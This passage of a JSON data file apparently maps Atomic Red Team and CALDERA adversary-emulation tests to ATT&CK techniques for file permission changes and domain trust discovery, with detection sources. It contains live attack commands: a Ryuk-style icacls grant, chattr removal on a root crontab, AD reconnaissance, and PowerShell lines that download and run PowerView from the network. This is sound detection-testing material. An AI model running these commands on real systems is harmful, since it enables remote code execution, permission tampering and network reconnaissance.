"file_or_folder": { + "description": "Path of the files to hide.", + "type": "Path", + "default": "%temp%\\T1222.001_attrib_2" + } + }, + "executor": { + "command": "mkdir #{file_or_folder} >nul 2>&1\necho T1222.001_attrib1 >> #{file_or_folder}\\T1222.001_attrib1.txt\necho T1222.001_attrib2 >> #{file_or_folder}\\T1222.001_attrib2.txt\nattrib.exe +h #{file_or_folder}\\T1222.001_attrib1.txt\nattrib.exe +h #{file_or_folder}\\T1222.001_attrib2.txt\n", + "cleanup_command": "del /A:H #{file_or_folder}\\T1222.001_attrib*.txt >nul 2>&1\n", + "name": "command_prompt" + } + }, + { + "name": "Grant Full 
Access to folder for Everyone - Ryuk Ransomware Style", + "auto_generated_guid": "ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6", + "description": "Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\\ drive for Everyone.\n**icacls \"C:\\*\" /grant Everyone:F /T /C /Q**\nHowever, for this atomic we set the permission on C:\\Users\\Public so it completes faster and doesn't irreversibly affect the host.\nYou can set your own path variable to \"C:\\*\" if you prefer.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "path": { + "description": "Path of folder to recursively set permissions on", + "type": "Path", + "default": "C:\\Users\\Public\\*" + }, + "file_path": { + "description": "Path of folder permission back", + "type": "Path", + "default": "%temp%\\T1222.001-folder-perms-backup.txt" + } + }, + "dependency_executor_name": "command_prompt", + "dependencies": [ + { + "description": "Backup of original folder permissions should exist (for use in cleanup commands)\n", + "prereq_command": "IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 )\n", + "get_prereq_command": "icacls #{path} /save #{file_path} /t /q >nul 2>&1\n" + } + ], + "executor": { + "command": "icacls \"#{path}\" /grant Everyone:F /T /C /Q", + "cleanup_command": "icacls '#{path}' /restore #{file_path} /q >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about 
instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + 
"definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1222.002", + "command_list": [ + null, + "chmod #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chmod a+w #{file_or_folder}\n", + "chmod #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chmod -R #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chmod -R a+w #{file_or_folder}\n", + "chmod -R #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chown root:#{group} #{file_or_folder}\n", + "chown #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "chown #{owner}:root #{file_or_folder}\n", + "chown -R root:#{group} #{file_or_folder}\n", + "chown -R #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chown -R #{owner}:root #{file_or_folder}\n", + "chown root #{file_or_folder}\n", + "chown #{owner} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "chown -R root 
#{file_or_folder}\n", + "chown -R #{owner} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "chattr -i /var/spool/cron/root\n" + ], + "commands": [ + { + "command": null, + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod a+w #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod -R #{numeric_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod -R a+w #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chmod -R #{symbolic_mode} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown root:#{group} #{file_or_folder}\n", + 
"source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown #{owner}:root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R root:#{group} #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R #{owner}:#{group} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R #{owner}:root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown #{owner} /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and 
Directory Permissions Modification" + }, + { + "command": "chown -R root #{file_or_folder}\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chown -R #{owner} /tmp/AtomicRedTeam/atomics/T1222.002\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + }, + { + "command": "chattr -i /var/spool/cron/root\n", + "source": "atomics/T1222.002/T1222.002.yaml", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1222.002", + "display_name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "atomic_tests": [ + { + "name": "chmod - Change file or folder mode (numeric mode)", + "auto_generated_guid": "34ca1464-de9d-40c6-8c77-690adf36a135", + "description": "Changes a file or folder's permissions using chmod and a specified numeric mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "numeric_mode": { + "description": "Specified numeric mode value", + "type": "Integer", + "default": 755 + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod #{numeric_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chmod - Change file or folder mode (symbolic mode)", + "auto_generated_guid": "fc9d6695-d022-4a80-91b1-381f5c35aff3", + "description": "Changes a file or folder's permissions using chmod and a specified symbolic mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + 
"symbolic_mode": { + "description": "Specified symbolic mode value", + "type": "String", + "default": "a+w" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod #{symbolic_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chmod - Change file or folder mode (numeric mode) recursively", + "auto_generated_guid": "ea79f937-4a4d-4348-ace6-9916aec453a4", + "description": "Changes a file or folder's permissions recursively using chmod and a specified numeric mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "numeric_mode": { + "description": "Specified numeric mode value", + "type": "Integer", + "default": 755 + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod -R #{numeric_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chmod - Change file or folder mode (symbolic mode) recursively", + "auto_generated_guid": "0451125c-b5f6-488f-993b-5a32b09f7d8f", + "description": "Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "symbolic_mode": { + "description": "Specified symbolic mode value", + "type": "String", + "default": "a+w" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chmod -R #{symbolic_mode} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder ownership and group", + "auto_generated_guid": "d169e71b-85f9-44ec-8343-27093ff3dfc0", + "description": "Changes a file or folder's ownership and group information using chown.\n", + 
"supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" + }, + "group": { + "description": "Group name of desired group", + "type": "String", + "default": "root" + } + }, + "executor": { + "command": "chown #{owner}:#{group} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder ownership and group recursively", + "auto_generated_guid": "b78598be-ff39-448f-a463-adbf2a5b7848", + "description": "Changes a file or folder's ownership and group information recursively using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + }, + "group": { + "description": "Group name of desired group", + "type": "String", + "default": "root" + } + }, + "executor": { + "command": "chown -R #{owner}:#{group} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chown - Change file or folder mode ownership only", + "auto_generated_guid": "967ba79d-f184-4e0e-8d09-6362b3162e99", + "description": "Changes a file or folder's ownership only using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml" + } + }, + "executor": { + "command": "chown #{owner} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": 
"chown - Change file or folder ownership recursively", + "auto_generated_guid": "3b015515-b3d8-44e9-b8cd-6fa84faf30b2", + "description": "Changes a file or folder's ownership only recursively using chown.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "owner": { + "description": "Username of desired owner", + "type": "String", + "default": "root" + }, + "file_or_folder": { + "description": "Path of the file or folder", + "type": "Path", + "default": "/tmp/AtomicRedTeam/atomics/T1222.002" + } + }, + "executor": { + "command": "chown -R #{owner} #{file_or_folder}\n", + "name": "bash" + } + }, + { + "name": "chattr - Remove immutable file attribute", + "auto_generated_guid": "e7469fe2-ad41-4382-8965-99b94dd3c13f", + "description": "Remove's a file's `immutable` attribute using `chattr`.\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_modify": { + "description": "Path of the file", + "type": "Path", + "default": "/var/spool/cron/root" + } + }, + "executor": { + "command": "chattr -i #{file_to_modify}\n", + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process 
creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1482", + "command_list": [ + "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", + "nltest /domain_trusts\n", + "Import-Module \"$env:TEMP\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=organizationalUnit)\n", + "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -gcb -sc trustdmp\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); 
Get-ForestTrust -Verbose\n", + "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n" + ], + "commands": [ + { + "command": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "nltest /domain_trusts\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "Import-Module \"$env:TEMP\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=organizationalUnit)\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -gcb -sc trustdmp\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose\n", + "source": "atomics/T1482/T1482.yaml", + "name": "Atomic Red Team Test - Domain Trust Discovery" + }, + { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 
1\n", + "source": "data/abilities/discovery/6131397e-7765-424e-a594-3d7fb2d93a6a.yml", + "name": "Determine the Windows Domain of a computer" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1482", + "display_name": "Domain Trust Discovery", + "atomic_tests": [ + { + "name": "Windows - Discover domain trusts with dsquery", + "auto_generated_guid": "4700a710-c821-4e17-a3ec-9e4c81d6845f", + "description": "Uses the dsquery command to discover domain trusts.\nRequires the installation of dsquery via Windows RSAT or the Windows Server AD DS role.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "dsquery * -filter \"(objectClass=trustedDomain)\" -attr *\n", + "name": "command_prompt" + } + }, + { + "name": "Windows - Discover domain trusts with nltest", + "auto_generated_guid": "2e22641d-0498-48d2-b9ff-c71e496ccdbe", + "description": "Uses the nltest command to discover domain trusts.\nRequires the installation of nltest via Windows RSAT or the Windows Server AD DS role.\nThis technique has been used by the Trickbot malware family.\n", + "supported_platforms": [ + "windows" + ], + "dependencies": [ + { + "description": "nltest.exe from RSAT must be present on disk\n", + "prereq_command": "WHERE nltest.exe >NUL 2>&1\n", + "get_prereq_command": "echo Sorry RSAT must be installed manually\n" + } + ], + "executor": { + "command": "nltest /domain_trusts\n", + "name": "command_prompt" + } + }, + { + "name": "Powershell enumerate domains and forests", + "auto_generated_guid": "c58fbc62-8a62-489e-8f2d-3565d7d96f30", + "description": "Use powershell to enumerate AD information.\nRequires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PowerView PowerShell script must exist on disk\n", + "prereq_command": "if (Test-Path $env:TEMP\\PowerView.ps1) {exit 0} else 
{exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1\" -OutFile \"$env:TEMP\\PowerView.ps1\"\n" + }, + { + "description": "RSAT PowerShell AD admin cmdlets must be installed\n", + "prereq_command": "if ((Get-Command \"Get-ADDomain\" -ErrorAction Ignore) -And (Get-Command \"Get-ADGroupMember\" -ErrorAction Ignore)) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "Write-Host \"Sorry RSAT must be installed manually\"\n" + } + ], + "executor": { + "command": "Import-Module \"$env:TEMP\\PowerView.ps1\"\nGet-NetDomainTrust\nGet-NetForestTrust\nGet-ADDomain\nGet-ADGroupMember Administrators -Recursive\n", + "name": "powershell" + } + }, + { + "name": "Adfind - Enumerate Active Directory OUs", + "auto_generated_guid": "d1c73b96-ab87-4031-bad8-0e1b3b8bf3ec", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory OUs\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=organizationalUnit)\n", + "name": "command_prompt" + 
} + }, + { + "name": "Adfind - Enumerate Active Directory Trusts", + "auto_generated_guid": "15fe436d-e771-4ff3-b655-2dca9ba52834", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Trusts\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -gcb -sc trustdmp\n", + "name": "command_prompt" + } + }, + { + "name": "Get-DomainTrust with PowerView", + "auto_generated_guid": "f974894c-5991-4b19-aaf5-7cc2fe298c5d", + "description": "Utilizing PowerView, run Get-DomainTrust to identify domain trusts. 
Upon execution, progress and info about trusts within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainTrust -Verbose\n", + "name": "powershell" + } + }, + { + "name": "Get-ForestTrust with PowerView", + "auto_generated_guid": "58ed10e8-0738-4651-8408-3a3e9a526279", + "description": "Utilizing PowerView, run Get-ForestTrust to identify forest trusts. Upon execution, progress and info about forest trusts within the domain being scanned will be displayed.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-ForestTrust -Verbose\n", + "name": "powershell" + } + } + ] + }, + { + "id": "6131397e-7765-424e-a594-3d7fb2d93a6a", + "name": "GetDomain", + "description": "Determine the Windows Domain of a computer", + "tactic": "discovery", + "technique": { + "attack_id": "T1482", + "name": "Domain Trust Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "Import-Module .\\powerview.ps1 -Force;\nGet-NetDomain | ConvertTo-Json -Depth 1\n", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.ad.forest", + "custom_parser_vals": { + "json_key": "Forest", + "json_type": "str" + } + }, + { + "source": "domain.ad.name", + "custom_parser_vals": { + "json_key": "Name", + "json_type": "str" + } + } + ] + }, + "payloads": [ + "powerview.ps1" + ] + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information 
